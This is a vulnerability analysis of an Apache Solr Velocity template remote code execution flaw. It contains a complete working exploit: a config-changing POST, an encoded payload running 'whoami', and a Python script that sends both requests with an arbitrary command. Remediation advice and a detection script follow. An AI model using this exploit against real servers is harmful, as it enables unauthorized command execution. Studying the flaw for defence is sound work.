Shulou Technology News & Howtos > Network Security. Shulou.com report, 05/31; last updated 2025-02-23.
This article analyzes the latest Apache Solr RCE vulnerability: first how to reproduce it, then how the exploit works inside Solr, traced through the code.
Introduction
Apache Solr has an RCE 0day (no vulnerability identifier had been assigned at the time of writing). Below we reproduce the issue and walk through the whole RCE path for reference.
Vulnerability reproduction
Version reproduced: 8.1.1
Exploitation takes two steps. First, confirm that the application has at least one core enabled (visible under Core Admin); the instance used here has a core named mycore.
Then POST the following JSON to that core's config interface (/solr/mycore/config):
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
Then request the following URL to trigger the RCE:
/solr/mycore/select?wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

Decoded, the v.template.custom parameter is a Velocity template: it defines an empty string $x, uses $x.class.forName to reach java.lang.Runtime, java.lang.Character and java.lang.String by reflection, runs whoami through Runtime.exec, waits for it to finish and then copies the process's stdout byte by byte into the response.

Principle
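The two requests above, as a small reproduction script. This is an added example, not code from the original post: it builds the Config API body and the select URL from a readable form of the template, so the encoded payload can be compared against the URL above, and lists cores from the Core Admin STATUS response that the "Core Admin" check relies on. The STATUS JSON is a constructed sample; base_url, the core name and the command are parameters (the post only uses mycore and whoami); nothing is sent unless reproduce() is called explicitly.

```python
"""Build and (optionally) send the two requests from the write-up."""
import json
import urllib.parse
import urllib.request

# Step 1 helper: Core Admin STATUS lists the cores. The JSON below is a
# constructed sample of that response, trimmed to what the parser needs.
CORE_STATUS_PATH = "/solr/admin/cores?action=STATUS&wt=json"
SAMPLE_CORE_STATUS = '{"responseHeader":{"status":0},"status":{"mycore":{"name":"mycore"}}}'


def cores_from_status(status_json: str) -> list:
    """Core names are the keys of the "status" object in the STATUS response."""
    return sorted(json.loads(status_json)["status"])


def config_update_body() -> str:
    """Request 1: register a VelocityResponseWriter named "velocity" with both
    resource loaders enabled (the JSON body from the write-up)."""
    return json.dumps({
        "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true",
        }
    })


def velocity_template(command: str = "whoami") -> str:
    """The decoded v.template.custom value, one directive per list entry."""
    directives = [
        "#set($x='')",                                        # any object exposes .class
        "#set($rt=$x.class.forName('java.lang.Runtime'))",    # reflection via Class.forName
        "#set($chr=$x.class.forName('java.lang.Character'))",
        "#set($str=$x.class.forName('java.lang.String'))",
        f"#set($ex=$rt.getRuntime().exec('{command}'))",      # Runtime.getRuntime().exec()
        "$ex.waitFor()",
        "#set($out=$ex.getInputStream())",
        "#foreach($i in [1..$out.available()])",             # read stdout byte by byte
        "$str.valueOf($chr.toChars($out.read()))",
        "#end",
    ]
    # The spaces between directives are plain template text; the query string
    # encodes them as '+', exactly as in the URL above.
    return " ".join(directives)


def select_url(core: str, command: str = "whoami") -> str:
    """Request 2: the select URL with wt=velocity and the template in the query."""
    params = {
        "wt": "velocity",
        "v.template": "custom",
        "v.template.custom": velocity_template(command),
    }
    return f"/solr/{core}/select?" + urllib.parse.urlencode(params)


def template_from_url(url: str) -> str:
    """Decode the v.template.custom parameter back out of a select URL."""
    query = urllib.parse.urlsplit(url).query
    return urllib.parse.parse_qs(query)["v.template.custom"][0]


def reproduce(base_url: str, core: str, command: str = "whoami") -> str:
    """Send both requests to a live instance and return the rendered output."""
    req = urllib.request.Request(
        base_url + f"/solr/{core}/config",
        data=config_update_body().encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    urllib.request.urlopen(req).read()
    with urllib.request.urlopen(base_url + select_url(core, command)) as resp:
        return resp.read().decode()


if __name__ == "__main__":
    print(cores_from_status(SAMPLE_CORE_STATUS))
    print(select_url("mycore"))
```

Running the script prints the core list from the sample and the fully encoded select URL; template_from_url() reverses the encoding, which is the quickest way to read a captured payload.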
Start with the first request. Because it configures mycore, set a breakpoint on the handleRequestBody method of SolrConfigHandler, which handles configuration requests.
Because it is a POST request, follow into handlePOST.
handlePOST first reads the current configuration of mycore and passes it, together with the configuration we sent, into handleCommands. The subsequent processing ends in addNamedPlugin, which registers a VelocityResponseWriter named velocity whose solr.resource.loader.enabled and params.resource.loader.enabled values are both true.
When the second request arrives, HttpSolrCall.call looks up the response writer by the value of the wt parameter; with wt=velocity it returns the VelocityResponseWriter we configured.
After a series of further calls we reach VelocityResponseWriter.write, the heart of this vulnerability. It first calls createEngine to build a Velocity engine in which the template custom.vm maps to our payload.
The malicious template is placed in the params.resource.loader.instance and solr.resource.loader.instance entries of the engine's overridingProperties.
This is the crucial point: for the template to reach params.resource.loader.instance and solr.resource.loader.instance, paramsResourceLoaderEnabled and solrResourceLoaderEnabled must both be true, which is exactly what the first request arranged.
VelocityResponseWriter.getTemplate then resolves the template named by the v.template parameter we submitted, i.e. the malicious one.
Finally, the template is retrieved and its merge method is called.
To understand the template you need to know the Velocity Java template engine (the template is an org.apache.velocity.Template object). The official description, translated:
Velocity is a template engine based on Java. It allows anyone to use a simple but powerful template language to reference objects defined in Java code.
In other words, the template engine can invoke Java code; we only need to know how to write the template.
## variable definition
#set($name = "velocity")
## variable assignment
#set($foo = $bar)
## method calls
#set($foo = "hello")
#set($foo.name = $bar.name)
#set($foo.name = $bar.getName($arg))
## loop syntax
#foreach($element in $list)
    This is $element $velocityCount
#end
## rendering the template (Java side)
template.merge(context, writer);
With these basics the construction of the payload is clear; for a deeper understanding consult the Velocity documentation, which we will not go into further here.
So the final merge call on the malicious template completes the RCE. The key call chain, as traced above:

Request 1: SolrConfigHandler.handleRequestBody -> handlePOST -> handleCommands -> addNamedPlugin (registers the VelocityResponseWriter with both loaders enabled)
Request 2: HttpSolrCall.call (selects the writer by wt) -> VelocityResponseWriter.write -> createEngine -> getTemplate -> Template.merge
Remediation
At the time of writing there is no official patch, so restrict access to Solr. The analysis above also shows that the exploit depends on a VelocityResponseWriter with params.resource.loader.enabled set to true, and that a single Config API POST is enough to enable it; so confirm that flag is false on every core and keep the Config API and admin endpoints unreachable from untrusted clients.
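Two checks that follow from the analysis, as an added example (not part of the original post): an audit of a core's config overlay for a Velocity writer that accepts templates from the request, and a scan of request-log lines for the two stages of the attack. The overlay JSON is what Solr's Config API returns from GET /solr/<core>/config/overlay after the malicious POST; both the overlay and the log lines are constructed samples, and the combined log format is an assumption (a Solr request log may be formatted differently).

```python
"""Audit a core's config overlay and request log for the Velocity RCE pattern."""
import json
import re
import urllib.parse

# Constructed sample of GET /solr/mycore/config/overlay after the malicious POST.
SAMPLE_OVERLAY = json.dumps({
    "responseHeader": {"status": 0, "QTime": 1},
    "overlay": {
        "znodeVersion": 3,
        "queryResponseWriter": {
            "velocity": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            }
        },
    },
})

# The same overlay with both loader flags turned off.
SAFE_OVERLAY = SAMPLE_OVERLAY.replace('"true"', '"false"')

# Constructed request-log lines (combined log format) showing both stages
# plus one ordinary query that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2019:10:00:01 +0000] "POST /solr/mycore/config HTTP/1.1" 200 41',
    '10.0.0.5 - - [31/May/2019:10:00:02 +0000] "GET /solr/mycore/select?wt=velocity'
    '&v.template=custom&v.template.custom=%23set(%24x%3D%27%27)+%23set(%24rt%3D%24x'
    '.class.forName(%27java.lang.Runtime%27)) HTTP/1.1" 200 12',
    '10.0.0.9 - - [31/May/2019:10:00:03 +0000] "GET /solr/mycore/select?q=*:*&wt=json HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def risky_velocity_writers(overlay_json: str) -> list:
    """Names of VelocityResponseWriters that accept a template from the request.

    params.resource.loader.enabled is the flag the write-up identifies as the
    precondition: with it true, v.template.custom becomes a template source.
    """
    overlay = json.loads(overlay_json).get("overlay", {})
    writers = overlay.get("queryResponseWriter", {})
    return [
        name for name, cfg in writers.items()
        if "VelocityResponseWriter" in str(cfg.get("class", ""))
        and str(cfg.get("params.resource.loader.enabled", "false")).lower() == "true"
    ]


def flag_requests(lines) -> list:
    """(method, path, reason) for each request matching one of the two stages."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        method, target = m.group("method"), m.group("path")
        parts = urllib.parse.urlsplit(target)
        params = urllib.parse.parse_qs(parts.query)
        if method == "POST" and parts.path.endswith("/config"):
            # Stage 1: a Config API write. Administrators do this too, so
            # correlate with the request body or a later overlay audit.
            hits.append((method, parts.path, "Config API write"))
        elif params.get("wt") == ["velocity"] and any(k.startswith("v.template.") for k in params):
            # Stage 2: template text delivered in the query string.
            tmpl = " ".join(v for k, vs in params.items() if k.startswith("v.template.") for v in vs)
            reason = "Velocity template supplied in request"
            if ".class.forName(" in tmpl or "getRuntime(" in tmpl:
                reason += ", reflection to java.lang.Runtime"
            hits.append((method, parts.path, reason))
    return hits


if __name__ == "__main__":
    print("risky writers:", risky_velocity_writers(SAMPLE_OVERLAY))
    for hit in flag_requests(SAMPLE_LOG):
        print(*hit)
```

The overlay audit is the more reliable of the two: a Config API POST is legitimate administrative traffic, whereas a VelocityResponseWriter with params.resource.loader.enabled set to true is the exact state the exploit needs, and it persists after the attacker's requests have left the log.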